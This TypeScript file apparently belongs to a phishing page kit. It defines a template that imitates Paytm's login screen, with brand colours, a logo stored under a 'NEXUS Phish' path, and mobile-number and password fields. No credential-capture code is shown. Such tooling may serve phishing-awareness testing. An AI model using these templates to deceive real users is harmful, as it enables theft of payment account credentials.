import { CreditCard, Wallet } from "lucide-react";
import { LoginTemplate } from "./types";

export const paymentTemplates: LoginTemplate[] = [
  {
    id: "paytm",
    name: "Paytm",
    description: "Login to your Paytm account",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/paytm.png?updatedAt=1742180741573",
    primaryColor: "#00BAF2",
    secondaryColor: "#002970",
    usernameLabel: "Mobile Number",
    usernameType: "tel",
    usernamePattern: "[0-9]{10}",
    passwordLabel: "Password",
    buttonText: "Login",
    forgotPasswordText: "Forgot Password?",
    signupText: "Don't have an account? Sign Up",
    additionalOptions: [
      { text: "Login with OTP", url: "#" }
    ],
    category: "payment"
  }
];